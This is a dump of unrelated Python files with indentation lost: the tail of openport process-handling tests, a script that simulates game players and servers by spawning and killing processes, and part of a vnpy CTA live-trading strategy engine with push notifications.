"sleep(3); print 'bbb'"])
output = run_command_with_timeout(command, 1)
self.assertEqual(('aaa', False), output)
def test_get_output__simple(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
print command
command.extend(['-c', "print 'hello'"])
output = run_command_with_timeout(command, 1)
self.assertEqual(('hello', False), output)
def test_get_output__stderr(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = self.os_interaction.get_python_exec()
command.extend(['-c', "import sys; sys.stderr.write('hello_err')"])
output = run_command_with_timeout(command, 1)
self.assertEqual((False, 'hello_err'), output)
def test_pid_is_running(self):
command = self.os_interaction.get_python_exec()
command.extend(['-c', "print 'hello'"])
process = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE,
shell=is_windows(),
close_fds=not is_windows())
process.wait()
self.assertFalse(self.os_interaction.pid_is_running(process.pid))
command = self.os_interaction.get_python_exec()
command.extend(['-c', "from time import sleep;sleep(1); print 'hello'"])
process = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE,
shell=is_windows(),
close_fds=not is_windows())
self.assertTrue(self.os_interaction.pid_is_running(process.pid))
def test_pid_is_openport_process(self):
port = self.os_interaction.get_open_port()
os.chdir(os.path.dirname(os.path.dirname(__file__)))
python_exe = self.os_interaction.get_python_exec()
p = subprocess.Popen(python_exe + ['apps/openport_app.py', '--local-port', '%s' % port,
'--server', 'http://test.openport.be', '--verbose'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
try:
self.assertTrue(self.os_interaction.pid_is_openport_process(p.pid))
finally:
p.kill()
def test_start_openport_process(self):
os.chdir(os.path.dirname(os.path.dirname(__file__)))
command = ['sudo', '-u', 'pi', '/usr/bin/openport', '2025', '--restart-on-reboot', '--request-port', '31261',
'--request-token', 'WkSXfYyksNy4vN2h', '--start-manager', 'False']
share = Share()
share.restart_command = command
method = self.os_interaction.start_process
self.os_interaction.start_process = Mock(return_value='')
try:
self.os_interaction.start_openport_process(share)
self.os_interaction.start_process.assert_has_calls(
[call(['env/bin/python', 'apps/openport_app.py', '2025', '--restart-on-reboot', '--request-port',
'31261', '--request-token', 'WkSXfYyksNy4vN2h', '--start-manager', 'False'])])
finally:
self.os_interaction.start_process = method
def test_kill_pid(self):
if not is_windows():
return
os.chdir(os.path.dirname(os.path.dirname(__file__)))
python_exe = self.os_interaction.get_python_exec()
p = subprocess.Popen(python_exe + ['tryouts/signal_test.py'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
sleep(1)
self.os_interaction.kill_pid(p.pid)
run_method_with_timeout(p.wait, 2)
self.assertNotEqual(None, p.poll())
output = self.os_interaction.output(p)
print output[0]
print output[1]
if not is_windows():
self.assertTrue(output[0] and 'got signal' in output[0])
def test_run_function_with_lock(self):
x = [0]
def add_one():
a = x[0]
sleep(0.001)
x[0] = a + 1
threads = []
thread_amount = 10 # Setting this number too high will fail the tests because the system cannot generate so much lockfiles
for i in range(thread_amount):
t = threading.Thread(target=lambda: self.os_interaction.run_function_with_lock(add_one, 'add_one'))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
self.assertEqual(x[0], thread_amount)
def test_copy_to_clipboard(self):
text1 = 'hallo'
self.os_interaction.copy_to_clipboard(text1)
self.assertEqual(text1, pyperclip.paste())
text2 = 'daag'
self.os_interaction.copy_to_clipboard(text2)
self.assertEqual(text2, pyperclip.paste())
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test-reports'))
|
simulation.py
|
import argparse
import emulation.GTAEventsReader
import time
import os
import subprocess
import sys
from threading import Thread
from threading import Lock
from decimal import Decimal
from common.constants import init_logger
import logging
SLAVE_NODE_SERVER_NAME_PREFIX = "slave_"
MASTER_NODE_SERVER_NAME = "master_node"
MASTER_SERVER = " 0"
SIMULATION_SERVERS_WARMUP_TIME = 3
logger = logging.getLogger("sys." + __name__.split(".")[-1])
LOCATION_CLIENT_APP_WINDOWS = '..\\client\\app.py'
LOCATION_CLIENT_APP_LINUX = '../client/app.py'
LOCATION_SERVER_APP_WINDOWS = '..\\server\\app.py'
LOCATION_SERVER_APP_LINUX = '../server/app.py'
# This method adds a client to the simulation.
# Input: lock: lock object for concurrency control,
# event_details: the details related to the connection of the client to the simulation.
# adjTimestamp: an adjustment on the timestamp to discount the time that took for the event to be triggered.
# Output: none.
def addClient(lock, event_details, clientApp, adjTimestamp):
# If the delayed time is longer than the timestamp in which the event should be trigger, the sleep is skiped and
# the event is triggered automatically.
if event_details.timeStamp - Decimal(adjTimestamp) > 0:
time.sleep(event_details.timeStamp - Decimal(adjTimestamp))
# command line to start the client application: python ../client/app.py --log-prefix player_id
proc = subprocess.Popen([sys.executable, "-m", "client.app", '--log-prefix', event_details.playerId, '--config','./test/das_config.json'])
logger.debug("This is the playerId: " + event_details.playerId + " and this is the PID:" + str(proc.pid))
with lock:
playersAndProcesses[event_details.playerId] = proc.pid
logger.info("Player: " + event_details.playerId + " joining the game.")
return
# This method removes a client to the simulation.
# Input: lock: lock object for concurrency control,
# event_details: the details related to the connection of the client to the simulation.
# adjTimestamp: an adjustment on the timestamp to discount the time that took for the event to be triggered.
# isWindows: if the current execution is on Windows.
# Output: none.
def removeClient(lock, event_details, isWindows, adjTimestamp):
with lock:
numberOfPlayers = len(playersAndProcesses)
if numberOfPlayers > 0:
if event_details.timeStamp - Decimal(adjTimestamp) > 0:
time.sleep(event_details.timeStamp - Decimal(adjTimestamp))
if not isWindows:
commandLine = "kill -9 " + str(playersAndProcesses[event_details.playerId])
else:
#Killing the process using a Windows command
commandLine = "taskkill /f /pid " + str(playersAndProcesses[event_details.playerId])
# Executing the command to kill the respective process.
os.system(commandLine)
with lock:
playersAndProcesses[event_details.playerId] = None
numberOfPlayers = len(playersAndProcesses)
logger.info("Player: " + event_details.playerId + " leaving the game.")
else:
logger.info("This player currently doesn't have an active session, so no Logout action will be performed.")
return
if numberOfPlayers == 0:
logger.info("This was the last player to leave the game, end of simulation.")
def triggerJoinLeaveEvents(listOfEventsToTrigger, lock, clientApp, delayBetweenEvents):
listOfThreads = []
adjustmentTimestamp = 0
for event in listOfEventsToTrigger:
if event.eventType == emulation.GTAEventsReader.PLAYER_LOGIN:
thread = Thread(target=addClient, args=(lock, event, clientApp, adjustmentTimestamp,))
thread.start()
listOfThreads.append(thread)
else:
if event.eventType == emulation.GTAEventsReader.PLAYER_LOGOUT:
thread = Thread(target=removeClient, args=(lock, event, runningWindows, adjustmentTimestamp,))
thread.start()
listOfThreads.append(thread)
#Assuming that the time between events is respected also for Login/logout
time.sleep(delayBetweenEvents)
adjustmentTimestamp += delayBetweenEvents
# Waits for all threads to finish
for single_thread in listOfThreads:
single_thread.join()
def addServer(event_details, serverApp, configFile, serverName, target_port, is_master):
time.sleep(event_details.timeStamp)
# Starting the server
# command line to start the base server: python ../server/app.py --log-prefix player_id
if is_master:
proc = subprocess.Popen([sys.executable, "-m", "server.app" ,'--users', 'test/das_map.json' , '--config', configFile, '--log-prefix', serverName, '--port', str(target_port)])
else:
proc = subprocess.Popen([sys.executable, "-m", "server.app" , '--config', configFile, '--log-prefix', serverName, '--port', str(target_port)])
if proc.pid > 0:
logger.info("Server" + serverName + "successfully added. Process Id: " + str(proc.pid))
serverProcesses[serverName] = proc.pid
else:
logger.error("Error while loading the base server. Simulation will be aborted.")
return
if MASTER_NODE_SERVER_NAME == serverName:
time.sleep(SIMULATION_SERVERS_WARMUP_TIME)
def triggerServerEvents(serverApp, configFile, base_port, port_offset, numSlaveServers, listOfServerEvents):
# The list of server events precedes the parameter numSlaveServers
if (listOfServerEvents is not None):
for event in listOfServerEvents:
if event.eventType == emulation.GTAEventsReader.SERVER_ADD:
if event.playerId == MASTER_SERVER:
thread = Thread(target=addServer, args=(event, serverApp,configFile,MASTER_NODE_SERVER_NAME, base_port, True))
else:
slave_port = base_port + port_offset * int(event.playerId)
thread = Thread(target=addServer, args=(event, serverApp, configFile, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip(), str(slave_port), False))
thread.start()
else:
if event.eventType == emulation.GTAEventsReader.SERVER_REMOVE:
if event.playerId == MASTER_SERVER:
thread = Thread(target=killServer, args=(event, MASTER_NODE_SERVER_NAME,))
else:
thread = Thread(target=killServer, args=(event, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip(),))
thread.start()
# if event.eventType == emulation.GTAEventsReader.SERVER_ADD:
#
# if event.playerId == MASTER_SERVER:
# addServer(event, serverApp, configFile, MASTER_NODE_SERVER_NAME, base_port)
# else:
# slave_port = base_port + port_offset * int(event.playerId)
# addServer(event, serverApp, configFile, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip(), str(slave_port))
# else:
# if event.eventType == emulation.GTAEventsReader.SERVER_REMOVE:
# if event.playerId == MASTER_SERVER:
# killServer(event, MASTER_NODE_SERVER_NAME)
# else:
# killServer(event, SLAVE_NODE_SERVER_NAME_PREFIX + str(event.playerId).strip())
# else:
# logger.error("Server Event for" + event.playerId + " not identified")
else:
if(numSlaveServers is not None):
# Starting the base server
# command line to start the base server: python ../server/app.py --log-prefix player_id
proc = subprocess.Popen([sys.executable, serverApp, '--config', configFile, '--log-prefix', 'master_node', '--port', str(base_port)])
if proc.pid > 0:
logger.info("Base Server successfully added. Process Id: " + str(proc.pid))
serverProcesses.append(proc.pid)
else:
logger.error("Error while loading the base server. Simulation will be aborted.")
return
time.sleep(SIMULATION_SERVERS_WARMUP_TIME)
# Initializing the slave servers for simulation
i = 1
while i <= numSlaveServers:
slave_port = base_port + port_offset*i
proc = subprocess.Popen([sys.executable, serverApp, '--config', configFile, '--log-prefix', 'slave_' + str(i), '--config', str(slave_port)])
if proc.pid > 0:
logger.info("Slave Server " + str(i) + " successfully added. Process Id:" + str(proc.pid))
serverProcesses.append(proc.pid)
else:
logger.error("Error while loading slave server " + str(i) + ".")
i += 1
time.sleep(SIMULATION_SERVERS_WARMUP_TIME)
else:
logger.error("The number of slave servers or a list of server events was not provided, "
"so no servers will be added to the simulation.")
return
# This kills the process for a given serverName used for the simulation.
# input: isWindows: if the current execution is on Windows.
# input: serverName
# Output: none.
def killServer(event_details, serverName):
time.sleep(event_details.timeStamp)
if serverProcesses[serverName] is not None:
if not runningWindows:
commandLine = "kill -9 " + str(serverProcesses[serverName])
else:
#Killing the process using a Windows command
commandLine = "taskkill /f /pid " + str(serverProcesses[serverName])
logger.info("Removing the server process:" + str(serverProcesses[serverName]))
# Executing the command to kill the respective process.
os.system(commandLine)
serverProcesses[serverName] = None
return
# This kills the processes used for the simulation.
# isWindows: if the current execution is on Windows.
# Output: none.
def killServers():
with serverLock:
numberOfProcesses = len(serverProcesses)
if numberOfProcesses > 0:
for serverProcess in serverProcesses:
if not runningWindows:
commandLine = "kill -9 " + str(serverProcess)
else:
#Killing the process using a Windows command
commandLine = "taskkill /f /pid " + str(serverProcess)
logger.info("Removing the server process:" + str(serverProcess))
# Executing the command to kill the respective process.
os.system(commandLine)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Simulation")
# Parameters related to the simulation
parser.add_argument("--elap-time", dest="simulationElapsedTimeInSeconds", default=30)
parser.add_argument("--delayBetweenEvents", dest="timeBetweenEvents", default=0.5)
parser.add_argument("--gta-file", dest="gtaFilename", default='WoWSession_Node_Player_Fixed_Dynamic_reduced.zip')
# Parameters related to the servers used in the simulation
parser.add_argument("--base-port", dest="basePort", default=7000)
parser.add_argument("--port-offset", dest="portOffset",default=1000)
parser.add_argument("--num-slave-servers", dest="numSlaveServers", default=0)
parser.add_argument("--server-event-file", dest="serverEventFilename")
parser.add_argument("--server-config", dest="serverConfig", default="./test/das_config.json")
# Example of parameters to invoke main --elap-time 15 --delayBetweenEvents 1 --gta-file WoWSession_Node_Player_Fixed_Dynamic_reduced.zip --server-event-file Server_Connectons_Disconnections.zip
args = parser.parse_args()
init_logger("log/simulation_{}.log".format(time.time()))
# Assigning the parameters received in the command line to the variables which will be used for the simulation
simulationElapsedTimeInSeconds = int(args.simulationElapsedTimeInSeconds)
timeBetweenEvents = float(args.timeBetweenEvents)
gtaFilename = args.gtaFilename
base_port = int(args.basePort)
port_offset = int(args.portOffset)
numSlaveServers = int(args.numSlaveServers)
serverEventFilename = args.serverEventFilename
configurationFile = args.serverConfig
# This list will contain pairs of players and the associated process.
global playersAndProcesses
playersAndProcesses = {}
# List of processes related to the servers used in the simulation (master + slaves)
global serverProcesses
serverProcesses = {}
# This lock is used to implement concurrency control on the list of players and processes which will be shared
# accros multiple threads.
lock = Lock()
serverLock = Lock()
runningWindows = False
if os.name == 'nt':
runningWindows = True
fileDir = os.path.dirname(os.path.realpath('__file__'))
# Depending on the OS in which the simulation is running the way in which the client and server are invoked is
# different.
if not runningWindows:
clientAppLocation = os.path.join(fileDir, LOCATION_CLIENT_APP_LINUX)
serverAppLocation = os.path.join(fileDir, LOCATION_SERVER_APP_LINUX)
else:
# Windows file structure
clientAppLocation = os.path.join(fileDir, LOCATION_CLIENT_APP_WINDOWS)
serverAppLocation = os.path.join(fileDir, LOCATION_SERVER_APP_WINDOWS)
# List of events still considering the timestamps read from the GTA file
listOfEvents = emulation.GTAEventsReader.LoadEventsFromFile(gtaFilename, emulation.GTAEventsReader.MODE_PLAYERS)
# Normalize the timeStamps of the Login/Logout events using the given simulation's elapsed time.
listOfNormalizedPlayerEvents = emulation.GTAEventsReader.NormalizeEvents(listOfEvents, simulationElapsedTimeInSeconds)
logger.info("Total number of Login/Logout events: " + str(len(listOfNormalizedPlayerEvents)))
# List of server events
listOfEvents = None
listOfEvents = emulation.GTAEventsReader.LoadEventsFromFile(serverEventFilename, emulation.GTAEventsReader.MODE_SERVERS)
if listOfEvents is not None:
# Normalize the timeStamps of the server events using the given simulation's elapsed time.
listOfNormalizedServerEvents = emulation.GTAEventsReader.NormalizeEvents(listOfEvents, simulationElapsedTimeInSeconds)
logger.info("Total number of server events: " + str(len(listOfNormalizedServerEvents)))
logger.info("Starting the simulation.")
logger.info("Initializing servers.")
triggerServerEvents(serverAppLocation, configurationFile, base_port, port_offset, numSlaveServers, listOfNormalizedServerEvents)
logger.info("Triggering events.")
triggerJoinLeaveEvents(listOfNormalizedPlayerEvents, lock, clientAppLocation, timeBetweenEvents)
if listOfEvents is None:
logger.info("List of server events not used - killing the processes related to the servers.")
killServers(runningWindows)
print("This is the end of the simulation.")
|
engine.py
|
""""""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread, Lock
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine, EVENT_TIMER
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
HistoryRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol, round_to
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_NOTIFY,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EVENT_DAILY_CLOSE,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
import jpush
STOP_STATUS_MAP = {
Status.SUBMITTING: StopOrderStatus.WAITING,
Status.NOTTRADED: StopOrderStatus.WAITING,
Status.PARTTRADED: StopOrderStatus.TRIGGERED,
Status.ALLTRADED: StopOrderStatus.TRIGGERED,
Status.CANCELLED: StopOrderStatus.CANCELLED,
Status.REJECTED: StopOrderStatus.CANCELLED
}
class CtaEngine(BaseEngine):
""""""
engine_type = EngineType.LIVE # live trading engine
setting_filename = "ib_cta_strategy_setting.json"
data_filename = "ib_cta_strategy_data.json"
daily_close_filename = "dail_close_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(CtaEngine, self).__init__(
main_engine, event_engine, APP_NAME)
self.strategy_setting = {} # strategy_name: dict
self.strategy_data = {} # strategy_name: dict
self.classes = {} # class_name: stategy_class
self.strategies = {} # strategy_name: strategy
self.symbol_strategy_map = defaultdict(
list) # vt_symbol: strategy list
self.orderid_strategy_map = {} # vt_orderid: strategy
self.strategy_orderid_map = defaultdict(
set) # strategy_name: orderid list
# self.stop_order_count = 0 # for generating stop_orderid
# self.stop_orders = {} # stop_orderid: stop_order
self.init_thread = None
self.init_queue = Queue()
self.vt_tradeids = set() # for filtering duplicate trade
self.offset_converter = OffsetConverter(self.main_engine)
self.notifier = None
self._lock = Lock()
self.daily_close_setting = {}
self._timer_count = 0
def init_engine(self):
"""
"""
self.init_notifier()
self.load_strategy_class()
self.load_strategy_setting()
self.load_strategy_data()
self.register_event()
self.write_log("CTA策略引擎初始化成功")
def close(self):
""""""
self.stop_all_strategies()
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_CTA_NOTIFY, self.process_notify_event)
self.event_engine.register(EVENT_DAILY_CLOSE, self.process_daily_close_event)
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def init_notifier(self):
from vnpy.trader.setting import get_settings
push_settings = get_settings('notification.')
if push_settings:
krPush = jpush.JPush(push_settings['app_key'], push_settings['master_secret'])
self.notifier = krPush.create_push()
self.notifier.audience = jpush.all_
self.notifier.platform = jpush.all_
def process_tick_event(self, event: Event):
""""""
tick = event.data
strategies = self.symbol_strategy_map[tick.vt_symbol]
if not strategies:
return
# self.check_stop_order(tick)
for strategy in strategies:
if strategy.inited:
self.call_strategy_func(strategy, strategy.on_tick, tick)
def process_order_event(self, event: Event):
""""""
order = event.data
self.offset_converter.update_order(order)
strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
if not strategy:
return
# Remove vt_orderid if order is no longer active.
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if order.vt_orderid in vt_orderids and not order.is_active():
vt_orderids.remove(order.vt_orderid)
# For server stop order, call strategy on_stop_order function
if order.type == OrderType.STOP:
so = StopOrder(
vt_symbol=order.vt_symbol,
direction=order.direction,
offset=order.offset,
price=order.price,
volume=order.volume,
stop_orderid=order.vt_orderid,
strategy_name=strategy.strategy_name,
status=STOP_STATUS_MAP.get(order.status, ""),
vt_orderids=[order.vt_orderid],
)
self.call_strategy_func(strategy, strategy.on_stop_order, so)
# Call strategy on_order function
self.call_strategy_func(strategy, strategy.on_order, order)
self.write_log(f'ORDER[{order.type.value}]<{order.vt_orderid}>:#{order.vt_symbol} {order.direction.value} {order.volume}@{order.price} -- {order.status}', strategy)
def process_trade_event(self, event: Event):
""""""
trade = event.data
# Filter duplicate trade push
if trade.vt_tradeid in self.vt_tradeids:
return
self.vt_tradeids.add(trade.vt_tradeid)
self.offset_converter.update_trade(trade)
strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
if not strategy:
return
# Update strategy pos before calling on_trade method
if trade.direction == Direction.LONG:
strategy.pos += trade.volume
else:
strategy.pos -= trade.volume
self.call_strategy_func(strategy, strategy.on_trade, trade)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
database_manager.save_trade_data([trade], strategy.strategy_name)
# Update GUI
self.put_strategy_event(strategy)
self.write_log(f'TRADE<{trade.vt_tradeid}>:#{trade.vt_symbol} {trade.direction.value} {trade.volume}@{trade.price}', strategy)
def process_position_event(self, event: Event):
""""""
position = event.data
self.offset_converter.update_position(position)
def process_notify_event(self, event: Event):
notification = event.data.msg
if self.notifier:
self.notifier.notification = jpush.notification(alert=notification)
try:
response = self.notifier.send()
except jpush.common.Unauthorized as unauth:
self.write_log(f'KRPushUnauthorized: {unauth}')
except jpush.common.APIConnectionException as conne:
self.write_log(f'KRPushAPIConnectionException: {conne}')
except jpush.common.JPushFailure as pushFail:
self.write_log(f'KRPushFailure: {pushFail}')
except Exception as e:
self.write_log(f'KRPushException: {e}')
else:
self.write_log(f'KRPush未配置,无法推送->{notification}')
def process_daily_close_event(self, event: Event):
print(f'日内平仓测试{event}')
# self.close_all_strategies_pos()
def process_timer_event(self, event: Event):
self._timer_count += 1
if self._timer_count%3 == 0 and \
self.daily_close_setting and \
timedelta(seconds=-35) < datetime.now() - self.daily_close_setting['time'] < timedelta(seconds=-30):
self.event_engine.put(Event(EVENT_DAILY_CLOSE))
if self._timer_count < 600:
return
self._timer_count = 0
self.load_daily_close_setting()
def send_server_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
type: OrderType,
):
"""
Send a new order to server.
"""
# Create request and send order.
original_req = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
offset=offset,
type=type,
price=price,
volume=volume,
orderRef=strategy.strategy_name
)
# Convert with offset converter
# req_list = self.offset_converter.convert_order_request(original_req, lock)
req_list = [original_req]
# Send Orders
vt_orderids = []
for req in req_list:
vt_orderid = self.main_engine.send_order(
req, contract.gateway_name)
# Check if sending order successful
if not vt_orderid:
continue
vt_orderids.append(vt_orderid)
self.offset_converter.update_order_request(req, vt_orderid)
# Save relationship between orderid and strategy.
self.orderid_strategy_map[vt_orderid] = strategy
self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)
return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
)
def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
Cancel existing order by vt_orderid.
"""
order = self.main_engine.get_order(vt_orderid)
if not order:
self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
return
req = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def send_order(
self,
strategy: CtaTemplate,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool
):
"""
"""
contract = self.main_engine.get_contract(strategy.vt_symbol)
if not contract:
self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
return ""
# Round order price and volume to nearest incremental value
price = round_to(price, contract.pricetick)
volume = round_to(volume, contract.min_volume)
if stop:
return self.send_server_stop_order(strategy, contract, direction, offset, price, volume)
else:
return self.send_limit_order(strategy, contract, direction, offset, price, volume)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
def get_engine_type(self):
""""""
return self.engine_type
def load_bar(
self,
vt_symbol: str,
days: int,
interval: Interval,
callback: Callable[[BarData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"load_bar失败,找不到合约:{vt_symbol}")
return ""
req = HistoryRequest(symbol, exchange, start=start, end=None, interval=interval)
bars = self.main_engine.query_history(req, contract.gateway_name)
for bar in bars:
callback(bar)
def load_tick(
self,
vt_symbol: str,
days: int,
callback: Callable[[TickData], None]
):
""""""
symbol, exchange = extract_vt_symbol(vt_symbol)
end = datetime.now()
start = end - timedelta(days)
ticks = database_manager.load_tick_data(
symbol=symbol,
exchange=exchange,
start=start,
end=end,
)
for tick in ticks:
callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
def add_strategy(
self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
):
"""
Add a new strategy.
"""
if strategy_name in self.strategies:
self.write_log(f"创建策略失败,存在重名{strategy_name}")
return
strategy_class = self.classes.get(class_name, None)
if not strategy_class:
self.write_log(f"创建策略失败,找不到策略类{class_name}")
return
strategy = strategy_class(self, strategy_name, vt_symbol, setting)
self.strategies[strategy_name] = strategy
# Add vt_symbol to strategy map.
strategies = self.symbol_strategy_map[vt_symbol]
strategies.append(strategy)
# Update to setting file.
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def init_strategy(self, strategy_name: str):
"""
Init a strategy.
"""
self.init_queue.put(strategy_name)
if not self.init_thread:
self.init_thread = Thread(target=self._init_strategy)
self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
def start_strategy(self, strategy_name: str):
"""
Start a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿重复操作")
return
self.write_log("策略启动", strategy)
self.call_strategy_func(strategy, strategy.on_start)
strategy.trading = True
self.put_strategy_event(strategy)
def recover_strategy(self, strategy_name: str):
"""
Recover a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.inited:
self.write_log(f"策略{strategy.strategy_name}恢复失败,请先初始化")
return
if strategy.trading:
self.write_log(f"{strategy_name}已经启动,请勿做恢复操作")
return
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
variables = {}
if data:
for name in strategy.variables:
if name in ['inited', 'trading']:
continue
variables[name] = data.get(name, None)
self.recover_orders_and_trades()
self.write_log("策略恢复", strategy)
self.call_strategy_func(strategy, strategy.on_recover, variables)
self.put_strategy_event(strategy)
def stop_strategy(self, strategy_name: str):
"""
Stop a strategy.
"""
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
self.write_log("策略停止", strategy)
# Call on_stop function of the strategy
self.call_strategy_func(strategy, strategy.on_stop)
# Change trading status of strategy to False
strategy.trading = False
# Cancel all orders of the strategy
self.cancel_all(strategy)
# Sync strategy variables to data file
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def close_strategy_pos(self, strategy_name: str):
strategy = self.strategies[strategy_name]
if not strategy.trading:
return
# Cancel all orders of the strategy
self.cancel_all(strategy)
if strategy.pos != 0:
tick = self.main_engine.get_tick(strategy.vt_symbol)
if not tick:
self.write_log(f"不存在Tick,请先订阅", strategy)
return
if strategy.pos > 0:
strategy.send_order(Direction.SHORT, Offset.CLOSE, tick.last_price - 15, strategy.pos)
else:
strategy.send_order(Direction.LONG, Offset.CLOSE, tick.last_price + 15, -strategy.pos)
self.sync_strategy_data(strategy)
# Update GUI
self.put_strategy_event(strategy)
def edit_strategy(self, strategy_name: str, setting: dict):
"""
Edit parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
strategy.update_setting(setting)
self.update_strategy_setting(strategy_name, setting)
self.put_strategy_event(strategy)
def modify_strategy_data(self, strategy_name: str, key: str, value):
"""
Change parameters or variable of a straegy.
"""
strategy = self.strategies[strategy_name]
if not hasattr(strategy, key):
self.write_log(f"策略{strategy.strategy_name}不存在字段:{key}")
return
_type = type(getattr(strategy, key))
with self._lock:
try:
setattr(strategy, key, _type(value))
except Exception as e:
self.write_log(f"策略{strategy.strategy_name}设置{key}错误--{e}")
self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
def load_strategy_class(self):
"""
Load strategy class from source code.
"""
path1 = Path(__file__).parent.joinpath("strategies")
self.load_strategy_class_from_folder(
path1, "vnpy.app.ib_cta_strategy.strategies")
path2 = Path.cwd().joinpath("strategies")
self.load_strategy_class_from_folder(path2, "strategies")
def recover_orders_and_trades(self):
"""
recover strategy orders from open orders.
